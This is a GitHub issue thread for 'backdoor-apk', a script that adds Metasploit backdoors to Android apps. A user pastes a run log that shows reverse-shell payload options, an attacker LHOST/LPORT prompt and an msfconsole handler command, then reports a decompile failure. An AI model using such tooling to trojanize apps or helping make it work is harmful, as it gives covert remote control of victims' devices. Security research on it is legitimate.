dana-at-cp / backdoor-apk

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.
Apache License 2.0
2.17k stars 699 forks source link

Failed to compiled . #174

Closed ProXpert89 closed 5 years ago

ProXpert89 commented 5 years ago

[] Running backdoor-apk.sh v0.2.4a on Fri Jul 19 11:36:23 +08 2019 [+] Android payload options: 1) meterpreter/reverse_http 3) meterpreter/reverse_tcp 5) shell/reverse_https 2) meterpreter/reverse_https 4) shell/reverse_http 6) shell/reverse_tcp [?] Please select an Android payload option: 3 [?] Please enter an LHOST value: xx.xx.xx.xxx [?] Please enter an LPORT value: 443 [+] Android manifest permission options: 1) Keep original 2) Merge with payload and shuffle [?] Please select an Android manifest permission option: 2 [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc [] Decompiling original APK file...done. [!] Failed to decompile original APK file

any idea ?

dana-at-cp commented 5 years ago

Apktool is used to decompile/recompile APK files.